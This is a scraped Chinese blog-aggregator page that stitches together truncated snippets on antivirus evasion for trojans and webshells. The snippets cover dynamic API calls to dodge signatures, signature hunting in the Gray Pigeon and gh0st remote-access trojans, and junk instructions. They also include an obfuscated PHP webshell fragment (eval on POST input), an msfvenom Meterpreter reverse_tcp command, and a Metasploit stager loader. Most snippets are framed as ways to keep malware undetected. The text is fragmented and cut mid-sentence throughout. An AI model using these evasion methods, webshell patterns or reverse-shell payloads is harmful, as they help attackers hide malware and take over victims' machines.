干货|-C加载器尝试哆啦安全|知识星球上线啦(优惠券活动即将到期)!!!微信公众号
原创 2021-12-14 09:21:43
933阅读
假设我们的特征码定位在MessageBoxA函数的地址(只是举个例子,一般这个函数不会被杀,其他函数也类似方法)那么我们到源码里面发现,我们在PrintMsg函数中调用了这个API函数,那么我们就要对他进行处理。对于输入表被查杀我们一般的处理方法是修改函数的调用方式,比如采用dll动态调用,通过上图,我们知道我们是以非unicode方式编译的MessageBox,他对应的非Unicode的函数为MessageBoxA,同时我们也得到这个MessageBoxA函数在UER32.dll文件中。那么我们修改MessageBox的调用方式为dll的动态调用,其代码修改成:typedef int (WI
转载 2012-10-31 09:03:00
365阅读
2评论
源码C++基础 都一样 正常安装就行 有的是这个版本 这三个解压到 覆盖 因为之前安装过了 就看下路径吧 最后 提一下Assist 安装需要 进入那个vc98 目录去 安装破解 如果缺dll 那就下一个加载就ok  
原创 2021-08-16 09:43:41
997阅读
一: 灰鸽子方法大全 在所有的版本中,黑防的鸽子算是比较好做的了,今天在这里,我就用他做案例 一,最经典的OD一半一半定位法 我们把整个黑色标记的区域看成是没有修改的木马代码把它从中间切平均分成两半,把其中的一半用nop 填充掉,再用瑞星内存,如果杀掉了就说明特征代码在我们没有nop 掉的一半,没有到就说明我们刚刚nop的一半中含有特征代码。 所演示的情况是特征代码在没有no
转载 精选 2009-07-15 21:36:01
7811阅读
这个绝对原创! + 首发!个人认为大致分为这几个方面:1.关键字拆分。 比如assert,可以写成 'a'.'ss'.'e'.'r'.'t'这样。2.可变变量、引用、可变函数。 可变变量 比如$a=$_POST['x'];$b='a';@eval($$b); 引用 比如$a=$_POST['x'
转载 2016-08-01 17:41:00
123阅读
2评论
 首先,我们准备工具:“ASProtect SKE 2.3 Beta” “Iexpress捆绑”“KaOs undetecter” “MaskPE 2.0最终版”;        教程开始:         第一步:    &nbs
转载 2009-12-11 20:22:54
1569阅读
2评论
       远控软件gh0st源码2010-12-13 14:57远控软件gh0st3.6开源了,开源意味 着我们可以在此基础上进行二次开发,同时也意味着软可以较容易的查杀该款 远控木马,既然要利用,我们就做好源码基础上的木马工作。 好久没有来博客了,我把这部分整理了一下,先抛一砖头,有兴趣的朋友可 以接着做,也可以和
原创 2011-12-21 06:58:39
5209阅读
1点赞
这个绝对原创! + 首发!个人认为大致分为这几个方面:1.关键字拆分。 比如assert,可以写成 'a'.'ss'.'e'.'r'.'t'这样。2.可变变量、引用、可变函数。 可变变量 比如$a=$_POST['x'];$b='a';@eval($$b); 引用 比如$a=$_POST['x'
转载 2018-11-17 15:53:00
174阅读
2评论
经测试,这种方式无法攻击windows10,因为它有defender,我们一旦运行起来,defender就会/x/meterpreter/reverse_tcp LPORT=13338 LHOST=192....
原创 2022-02-28 11:07:56
351阅读
测试
转载 2012-02-14 07:30:59
335阅读
经测试,这种方式无法攻击windows10,因为它有defender,我们一旦运行起来,defender就会把它干死不过,在电脑上装了360安全卫士的情况下,defender会被抑制,我们的后门就可以正常运行了先使用msfvenom生成shellcodemsfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=13338 LHOST=192....
原创 2021-06-29 11:08:00
1088阅读
环境Dev C ++kali 2020下载Dev C ++新建一个 Project 命名为Loader64 并将文件另存为 Loader64。将 Project 设置为 C Project,将应用程序设置为Console Application。从命令行执行44.jpg粘贴下面代码/* * A C-based stager client compat with the Metasploit Fra
转载 2021-05-17 11:10:28
802阅读
通过代码直接调用System.Management,替代powershell.exe c#代码,保存为1.cs: using System.Collections.ObjectModel; using System.Management.Automation; using System.Manage ...
转载 2021-07-17 23:39:00
1712阅读
2评论
(一)、应注意的事项:  1.的测试(在线杀毒、杀毒软件上报、世界反毒网:http://www.virustotal.com/zh-cn/) 在这里我建议大家不要上传自己的马到这样的网站上去.一上传不要多久就会被杀了.大家还是把软装在自己的电脑,然后测试比较好.  2.一个好的杀木马要过文件、内存、行为、主动防御等一些专杀软件.  3.目前一些常用的软有
原创 2009-07-25 22:12:58
2366阅读
2评论
一.关于的来源 为了让我们的木马在各种杀毒软件的威胁下活的更久. 二.什么叫和查杀 可分为二类: 1.文件和查杀:不运行程序用杀毒软件进行对该程序的扫描,所得结果。 2.内存的和查杀:判断的方法1运行后,用杀毒软件的内存查杀功能. 2用OD载入, 一.关于的来源 为了让我们的木马在各种杀毒软件的威胁下活的更久. 二.什么叫和查杀 可分为二类: 1.文件和查杀:
转载 2010-02-13 02:48:28
731阅读
webshellphp jsp https://xz.aliyun.com/t/10937https://xz.aliyun.com/t/10989php 传统php变形
原创 2022-04-29 21:48:25
107阅读
浓缩精华版教程作者:黑天使            第一部分:对国内外杀毒软件分析   在讲内存特征码前,先要分析国内外著名毒软件的内存查 特点。大家
转载 精选 2006-12-20 20:30:41
1752阅读
使用python一键生成webshell
原创 2023-08-04 19:18:17
1412阅读
#1 花指令 + pass 高启发语句 #2 字符串隐藏 利用工具 #3 动态调用 API 转到定义 动态调用 在原API 前,并且 改变原API位置函数 不要依赖软件 能手动写就自己手动改 ****** 那软件有bug — 自动选择dll  
原创 2021-07-13 10:56:58
584阅读
今天送上经典花指令 注:编写花指令,可参考以下成双指令,可任意自由组合.达到效果. push ebp pop ebp push eax pop eax push esp pop esp push 0 push 0 push 10 -------其中数字可以任意,注意与下面对应 push -10 nop -----------可任意在中间添加 与它等效的: mov EDI,EDIadd esp
原创 2010-09-30 13:23:52
2260阅读
  • 1
  • 2
  • 3
  • 4
  • 5